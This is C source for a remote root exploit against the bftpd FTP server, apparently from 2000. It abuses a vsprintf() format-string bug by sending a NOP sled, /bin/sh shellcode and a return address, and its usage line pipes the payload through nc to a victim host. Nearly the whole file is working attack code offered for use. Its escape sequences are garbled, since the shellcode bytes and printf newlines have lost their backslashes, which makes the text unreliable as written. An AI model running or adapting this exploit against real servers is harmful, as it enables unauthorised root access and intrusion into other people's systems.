*
 *  Copyright (c) 2000 - Security.is
 *
 *  The following material may be freely redistributed, provided
 *  that the code or the disclaimer have not been partly removed,
 *  altered or modified in any way. The material is the property
 *  of security.is. You are allowed to adopt the represented code
 *  in your programs, given that you give credits where it's due.
 *
 *  A no-name ftp-server has a serious bug which leads to remote root.
 *  Anyway, we exploit vsprintf() via format-string.
 *
 *  Discovered/coded by: DiGiT - teddi@linux.is
 *  Greets: security.is, ADM
 *  note: Coded during security.is weekend ;>
 *
 *  Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
 *  offset is optional and is arg1
 * 
 */

#include <stdio.h>

char shellcode[] =
  "x31xc0x31xdbx04x0bxcdx80x31xc0x40x40xcdx80x85"
  "xc0x75x28x89xd9x31xc0x41x04x3fxcdx80x31xc0x04"
  "x3fx41xebx1fx31xc0x5fx89x7fx08x88x47x07x89x47"
  "x0cx89xfbx8dx4fx08x8dx57x0cx04x0bxcdx80x31xc0"
  "x31xdbx40xcdx80xe8xdcxffxffxff/bin/sh";

#define ADDR 0xbffff83c

int main(int argc, char *argv[]) 
{
  char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256];
  int offset=0,length, nopcount=100,i;
  long nop_addr = ADDR;

  if(argc > 1)
    offset = atoi(argv[1]);

  memset (nopbuf, 'x90', nopcount);
  nop_addr = nop_addr + offset;

  strcpy(buf, nopbuf);
  strcat(buf, shellcode);

  length=1024-strlen(shellcode)-nopcount+4-14;

  strcat(buf, "%.");
  sprintf(lenbuf, "%dd", length);
  strcat(buf, lenbuf);

  sprintf(addrbuf, "%c%c%c%c",
    (unsigned char) ((nop_addr >>  0) & 0xff),
    (unsigned char) ((nop_addr >>  8) & 0xff),
    (unsigned char) ((nop_addr >> 16) & 0xff),
    (unsigned char) ((nop_addr >> 24) & 0xff));

  for(i = 0 ; i < 4 ; i++) 
    strcat(buf, addrbuf);

  fprintf(stderr, "Bftpd remote exploit, by DiGiTn");
  fprintf(stderr, "Using Address = 0x%xn", nop_addr);
  printf("%sn", buf);

  return 0;
}


// www.Syue.com [2000-11-29]